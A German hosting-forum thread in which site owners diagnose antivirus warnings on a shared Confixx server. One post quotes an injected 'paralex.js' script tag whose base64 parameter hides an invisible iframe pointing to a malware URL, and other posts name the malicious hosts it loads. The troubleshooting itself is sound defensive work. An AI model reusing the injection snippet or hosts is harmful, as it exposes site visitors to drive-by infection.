Hallo zusammen, keine Ahnung, ob ich mit meinem Anliegen im richtigen Forum bin.... Ich habe auf diversen Webseiten meines Hosters (celeros) auf einem bestimmten Sever seit 3-4 Wochen immer eine Malware-Warnung diverser AntiViren-Programme (in meinem Falle Avast). Anfangs tat mein Hoster das ab mit "meine Seiten haben Schadcode oder sind komprommitiert worden"... doch blöderweise erscheinen die Warnungen auch beim Aufruf der Confixx-Seite des Hosters (Servers). Es handelt sich um die Domains tippelsberg.de und hg-sys.de / bzw. um den Server "lennox.servertools24.de" Die Warnmeldung erscheint nicht direkt bei Aufruf der ersten Seiten, sondern erst bei "Aktualisieren (F5)" oder Aufruf einer weiteren Seite innerhalb der Web-Präsenz. Beim Aufruf der Confixx-Seite (lennox) erscheint die Meldung sofort. Der Hoster kommt nicht wirklich in Wallung, das Problem zu beheben. Übrigens wurde das Problem auch schon von anderen Besuchern meiner Webseite bemerkt, siehe hier: http://www.mozilo.de/forum/viewtopic.php?f=19&t=1437 (ab Seite 3) Kann mir/uns jemand helfen? Ist das ein Confixx-Fehler? Denn an meinen Seiten kann es nicht liegen. Dasselbe CMS läuft nämlich auch auf anderen Servern des Hosters, und da kommen die Warnmeldungen nicht! (Siehe z.B. labor7.de/schreiner2) Gruß aus Bochum, Thorsten
AW: Malware-Warnung Es finden keine Probleme beim aufrufen der Webseiten statt (Avast). Schon in betracht gezogen, dass der heimische Rechner infiziert ist?
AW: Malware-Warnung Es ist Code: <script src='/paralex.js?id=PGlmcmFtZSBzcmM9J2h0dHA6Ly9jeWJlci1mb3guY29tLzY2Ni9pbmRleC5waHAnIHN0eWxlPSdkaXNwbGF5OiBub25lJz4=;t=741'></script> im Sourcecode zu finden. In der Tat wird das nicht immer im Sourcecode geladen.
AW: Malware-Warnung @ Mr. Brain Erscheint aber beim ersten Aufruf der Webseiten nicht, erst bei Aktualisierung bzw. Aufruf einer weiteren Seite der Präsenz. Und beim Aufruf der Confixx-Seite (lennox.servertools24.de) direkt. Dieses "paralex.js" scheint mir sehr auf Confixx (Parallels) zu schließen.
AW: Malware-Warnung Das Script lädt Code von der Seite "cyber-fox.com" nach, die laut diversen Virenscannern tatsächlich schädlichen Code (JS:ScriptIP-inf [Trj]) enthält. Eventuell einfach mal "paralex.js" suchen & löschen und nach der Schwachstelle suchen, über die der Code nachgeladen werden konnte. Hier wird auf der Confixx Seite keine Warnmeldung ausgegeben. MfG
AW: Malware-Warnung Guten Morgen, ich kann die Malware-Meldung von Avast für lennox.servertools24.de bestätigen. Wende Dich bitte an den Seitenbetreiber, da nur dieser den Schadcode entfernen kann. Internette Grüße Reiko
AW: Malware-Warnung Was ich aber nicht verstehen kann: Hier macht ein netter, höflicher Mensch einen Thread auf und fragt höflich, ob andere das Problem bestätigen können und sofort wird er unhöflich angegangen. Das muss in der Tat nicht sein!! Und das der Threadstarter nicht daneben liegt, wie chichy anfangs behauptet, dass sein Rechner lokal infiziert sei, zeigt sich ja nun auch.
AW: Malware-Warnung Naja, beide haben sich nicht gerade "Nettiquette" verhalten... Jetzt ist nur die Frage, was Avast hier für einen Infekt anzeigt, bei mir bleibt die Meldung bei "lennox.servertools24.de" aus (ebenfalls fehlt hier das eingebundene Script) und auch Virustotal meint dazu "0/24": https://www.virustotal.com/url/8df0...9e3828d609435406f3c5d1b3816f080aa73/analysis/. Kann jemand mal die genaue Meldung von Avast posten? MfG
AW: Malware-Warnung So, der Hoster hat sich auf meine Support-Mail noch nicht gemeldet. Das Problem besteht weiterhin. Andere Webseiten, die auf dem Server lennox.servertools24.de liegen, haben dasselbe Problem. Einfach mal nach "lennox.servertools24.de" googeln (sind aber auch viele Confixx-Blank-Seiten vorhanden). Das CMS, das ich auf lennox für verschiedene Webseiten nutze, wird auch auf anderen Servern des Hosters von mir eingesetzt, so u.a. auf dem Server "lex" mit den Webseiten labor7.de/cnd und labor7.de/schreiner2 (2 Seiten, die im Kundenauftrag erstellt werden). Bei diesen Seiten erscheint keine Malware-Warnung! Ebenso nicht auf wion-beats.de (selbes CMS, anderer Hoster). Ich kann nicht ansatzweise etwas "verdächtiges" im Sourcecode meiner Seiten entdecken... Es ist echt zum Verzweifeln...
AW: Malware-Warnung Ich kann auch bestätigen, dass die Mailware-Warnung für lennox.server... von Avast mal kommt und mal nicht. Ist nicht zuverlässig reproduzierbar. Die genaue Meldung: Bösartige Webseite blockiert avast! Netzwerk-Schutz hat eine schädliche Webseite oder Datei blockiert. Infektions-Details: URL: "http://cyber-fox.com/666/index.php" Pozess: .../iexplore.exe Infektion: URL:Mal Interessant: tippelsberg.de zeigt ein ähnliches Verhalten, aber auch nicht bei jedem Aufruf. Zusätzlich zu oben zitierter Meldung warnt Avast dort auch vor einem Trojanischen Pferd. Es gibt da also definitiv ein Problem. Internette Grüße Reiko
AW: Malware-Warnung Diese Meldung erhalte ich von G-Data: Vielleicht hilft Dir diese Meldung weiter für deinen Hoster. Viel Glück!
AW: Malware-Warnung Hallo, ich bin ebenfalls bei Celeros auf "lennox.servertools24.de" und kann den Aufruf von "paralex.js" bestätigen. Das Script benutzt "document.write()", und als Sofortmaßnahme könnte man die Original-Funktion mit einem eigenen Script lahmlegen: <script type="text/javascript"> document.write=function(){}; </script> Bei mir wurden diese beiden Seiten nachgeladen: http://cyber-fox.com/666/index.php http://hassen23.jumpingcrab.com/t/ec97cf9ec3df9458cf3c69fc7cb9bbb9 Weiß jemand, wie man möglichst genau herausbekommt, welche Freundlichkeiten da für Besucher bereitgehalten werden? Danke für Hinweise!
AW: Malware-Warnung Hallo, ich habe hier einige unpassende Beiträge entfernt. Bitte bleibt alle beim Thema, damit die berechtigte Anfrage des TO geklärt werden kann. Gruß
AW: Malware-Warnung Vielen Dank für die konstruktiven Hilfestellungen @ Watzmann: Die Idee mit dem eigenen Script funktioniert soweit, dass Avast jetzt nicht mehr meckert (eben getestet auf der tippelsberg.de) Der Code (paralex.js) wird aber weiterhin geladen. 1. Beim ersten Aufruf der tippelsberg.de ist alles "normal" (bitte Sourcecode ganz unten anschauen) 2. Nach einmaliger (!) Aktualisierung (oder Besuch einer weiteren Seite, z.B. "Infos") bitte Sourcecode nochmal unten anschauen, da erscheint das Java wieder. Ich habe übrigens noch herausgefunden, dass die Malware-Meldung durch Avast nicht mehr erscheint, wenn ich einmal "infiziert" wurde und den Browser-Cache nicht geleert wurde. Wenn ich den Browser-Cache (FF und IE) geleert habe, erscheint das Phänomen wieder... Soviel also dazu, dass die Antivirensoftware mal anschlägt und mal nicht. Fakt ist aber auch, dass ich nach Besuch einer "infizierten" Seite - als Beispiel tippelsberg.de - ohne Leeren des Browser-Cache zwar keine Meldung der Software mehr bekomme, der JavaCode aber weiterhin auf anderen Seiten - z.B. lennox.servertools24.de vorhanden ist... Komische Sache das. Ich werde den Hoster nochmals kontaktieren, bislang hat er sich leider noch nicht gemeldet. Danke für Eure Hilfe und Gruß aus Bochum, Thorsten
AW: Malware-Warnung Dito. Auch meine Seite ist betroffen. Ich finde es unsäglich, dass Celeros nicht mal was unternimmt! Und das scheinbar schon seit Längerem! Bin erst seit nem Jahr dort und möchte nicht schon wieder wechseln, aber wenn das morgen nicht behoben ist, seh ich keine andere Möglichkeit.
AW: Malware-Warnung Stimmt, aber die "paralex.js" macht nur eins, sie entschlüsselt aus ihrem eigenen Searchpart die URL des Iframes, und schreibt diesen dann in die Seite. Wenn sie nicht mehr schreiben kann, ist an der Stelle Schluss. Ich hatte heute morgen auch eine Mail geschrieben. Das werden die schon ernst nehmen, wenn klar ist, dass es an ihnen liegen muss ... Gruß, Watzmann
AW: Malware-Warnung Ich verstehe die technischen Hintergründe noch nicht ganz. Wo liegt die paralex.js? Kann man den Zugriff vielleicht über die .htaccess unterbinden? Wo kommen die Cookies her? Was bewirken die Hacker mit dem Angriff? Und wieso unternimmt Celeros nichts?
AW: Malware-Warnung @ Watzmann: Ich habe Deinen Script jetzt auf den betroffenden Seiten eingefügt. Avast hält erstmal die Klappe ;-) Vielen Dank dafür! @ Aniel: Das frage ich mich auch. Also wo genau das "paralex.js" liegt... und was wirklich passiert, wenn man keine (aktuelle) Antivirensoftware installiert hat. Ist für einen Webseitenbetreiber natürlich höchst unangenehm, da die Besucher meinen, ich persönlich würde ihren Rechner infizieren wollen. Höchst frustrierend! Übrigens, wenn ich eine "verseuchte" Seite (in meinem Falle ein Spielplatz, um Plugins zu testen auf der hg-sys.de/mozilo4) aufrufe, zeigt mir das Firefox-Plugin "HTML-Validator" an, dass sich wohl ein (i)Frame auf die Seite schiebt, welches ansonsten nicht vorhanden ist (siehe Screenshot unten). Leider noch keine Antwort vom Hoster. (So langsam werde ich knatschig). http://tgbo.de/pics/lennox-malware-frame.jpg
AW: Malware-Warnung Wir möchten diesen Beitrag einmal zum Anlass für eine Kommentierung nehmen. Wir sind uns des Problems sehr wohl bewusst und sind nach wie vor an der Problemlösung dran. Wie unsere Kollegen auch schon erkannt haben, ist das Problem extrem schwer reproduzierbar und daher arbeiten wir noch nach wie vor an einer Lösung. Sobald das Problem behoben wurde, geben wir dies natürlich umgehend per Newsletter bekannt.
